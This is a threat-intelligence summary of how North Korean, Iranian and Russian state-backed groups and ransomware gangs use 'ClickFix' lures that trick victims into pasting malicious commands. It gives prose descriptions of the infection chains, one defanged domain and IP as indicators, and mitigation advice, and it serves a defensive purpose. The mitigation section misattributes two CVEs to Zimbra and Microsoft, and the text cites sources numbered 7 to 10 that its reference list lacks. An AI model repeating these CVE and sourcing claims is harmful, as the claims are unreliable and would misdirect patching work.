State-sponsored threat actors from North Korea, Iran, and Russia are increasingly leveraging the “ClickFix” social engineering tactic to breach high-value targets, including government, defense, and financial sectors. This method, which tricks victims into executing malicious PowerShell or terminal commands under false pretenses, has become a preferred tool for advanced persistent threat (APT) groups since late 20241. Recent campaigns have linked ClickFix to ransomware deployments and data theft, signaling a shift toward hybrid cybercrime-espionage operations2, 3.
TL;DR: Key Takeaways
- ClickFix Definition: Social engineering lures prompting victims to paste malicious commands (e.g., fake “device registration” or “error fixes”)4.
- Primary Actors: North Korea’s TA427, Iran’s TA450, Russia’s APT28 and UNK_RemoteRogue5.
- New Ransomware Links: Qilin and Black Basta groups now use ClickFix for initial access6.
- Critical IOCs: Domains like
securedrive.fin-tech[.]comand IP5.231.4[.]94tied to campaigns7.
Campaign Breakdown by APT Group
TA427 (North Korea): This group impersonates Japanese diplomats via spoofed emails containing malicious PDFs. The payload, QuasarRAT, is delivered through fake “secure drive” links. Infection chains typically involve PowerShell scripts spawning VBS files, which then create scheduled tasks for persistence8. A newly identified domain, securedrive.fin-tech[.]com, has been linked to their infrastructure as of April 20257.
TA450 (Iran): Posing as Microsoft security updates, TA450 distributes the “Level” remote monitoring and management (RMM) tool. Recent activity shows overlaps with Qilin ransomware attacks, including an incident targeting Lee Enterprises6. Targets span the Middle East, U.S., and European entities.
Russian APTs (APT28 & UNK_RemoteRogue): APT28 uses Google Spreadsheets with reCAPTCHA prompts to deliver SSH tunnels and Metasploit payloads. UNK_RemoteRogue exploits compromised Zimbra servers, sending fake Office links that deploy Empire C2 frameworks via JavaScript9. Both groups have been tied to Black Basta ransomware incidents, including a £4.5M attack on Southern Water6.
Technical Mitigation Strategies
To counter ClickFix attacks, organizations should:
- Block PowerShell execution in untrusted contexts via Group Policy or endpoint detection rules.
- Monitor RMM tools like AnyDesk and Level for anomalous activity.
- Patch Zimbra (CVE-2024-50623) and Microsoft (CVE-2024-55956) vulnerabilities frequently exploited in these campaigns10.
Conclusion
The adoption of ClickFix by state-sponsored actors underscores the tactic’s effectiveness in bypassing traditional defenses. With ransomware groups now co-opting these methods, the line between espionage and cybercrime continues to blur. Immediate action on technical controls and user training is critical to mitigate risks.
References
- [1] “State-Sponsored Hackers Weaponize ClickFix in Global Cyber Espionage Campaigns,” The Hacker News, Apr. 2025. [Online]. Available: https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html
- [2] “State-Sponsored Hackers Embrace ClickFix Social Engineering Tactic,” BleepingComputer, Apr. 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/
- [3] “Around the World in 90 Days: State-Sponsored Actors Try ClickFix,” Proofpoint, Apr. 2025. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
- [4] “Do Not Click If You See This on Your PC—It’s an Attack,” Forbes, Apr. 2025. [Online]. Available: https://www.forbes.com/sites/zakdoffman/2025/04/21/do-not-click-if-you-see-this-on-your-pc-its-an-attack/
- [5] “State-Sponsored Actors Spotted Using ClickFix,” TechRadar/Yahoo, Apr. 2025. [Online]. Available: https://www.yahoo.com/news/state-sponsored-actors-spotted-using-160300677.html
- [6] “State-Sponsored Hackers Leverage ClickFix in Global Cyber Espionage,” SecureBlink, Apr. 2025. [Online]. Available: https://www.secureblink.com/cyber-security-news/state-sponsored-hackers-leverage-click-fix-social-engineering-in-global-cyber-espionage
